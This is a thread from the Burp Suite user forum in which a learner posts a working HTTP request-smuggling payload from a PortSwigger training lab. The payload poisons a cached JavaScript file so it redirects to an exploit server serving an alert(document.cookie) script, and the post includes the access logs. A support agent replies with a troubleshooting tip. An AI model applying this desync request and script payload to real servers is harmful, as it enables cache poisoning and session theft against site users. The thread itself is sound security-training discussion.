Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Exploiting HTTP request smuggling to perform web cache poisoning - Failing to go to "Solved" status

Joshua | Last updated: Sep 27, 2024 03:44AM UTC

Here is my cache poisoning / Smuggled request POST / HTTP/1.1 Host: 0a16007d0305e2b380340869000b001a.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 185 Transfer-Encoding: chunked 0 GET /post/next?postId=3 HTTP/1.1 Host: exploit-0a190088031de26f8094071201cb00b9.exploit-server.net Content-Type: application/x-www-form-urlencoded Content-Length: 10 x=1 GET /resources/js/tracking.js HTTP/2 Host: 0a16007d0305e2b380340869000b001a.web-security-academy.net Connection: close My Exploit Server settings: File: /post Head: HTTP/1.1 200 OK Body: <script> alert(document.cookie) </script> I am Getting multiple hits from the victim in my logs, and on occasion, when I refresh the application site, I as well get re-directed to my exploit server and the alert executes. The logs: 10.0.3.226 2024-09-27 03:36:09 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 10.0.3.226 2024-09-27 03:36:17 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 75.1.242.172 2024-09-27 03:36:33 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36" 75.1.242.172 2024-09-27 03:36:49 +0000 "GET /log HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36" 75.1.242.172 2024-09-27 03:36:49 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36" 75.1.242.172 2024-09-27 03:37:12 +0000 "GET /log HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36" 75.1.242.172 2024-09-27 03:37:12 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36" 10.0.3.226 2024-09-27 03:37:25 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 10.0.3.226 2024-09-27 03:37:33 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 75.1.242.172 2024-09-27 03:37:45 +0000 "GET /log HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36" 75.1.242.172 2024-09-27 03:37:45 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36" 75.1.242.172 2024-09-27 03:37:59 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36" 10.0.3.226 2024-09-27 03:38:21 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 10.0.3.226 2024-09-27 03:38:28 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 10.0.3.226 2024-09-27 03:38:37 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 10.0.3.226 2024-09-27 03:38:43 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 10.0.3.226 2024-09-27 03:38:49 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 10.0.3.226 2024-09-27 03:38:55 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 10.0.3.226 2024-09-27 03:39:01 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 10.0.3.226 2024-09-27 03:39:06 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 10.0.3.226 2024-09-27 03:39:11 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" Clearly, this lab should be solving. But it is not.

Ben, PortSwigger Agent | Last updated: Sep 27, 2024 01:25PM UTC

Hi Joshua, If you try this across several different lab instances (so if you let the lab instance expire and relaunch the lab so that you obtain a lab with a different URL) does this behaviour persist?

Joshua | Last updated: Oct 01, 2024 01:18AM UTC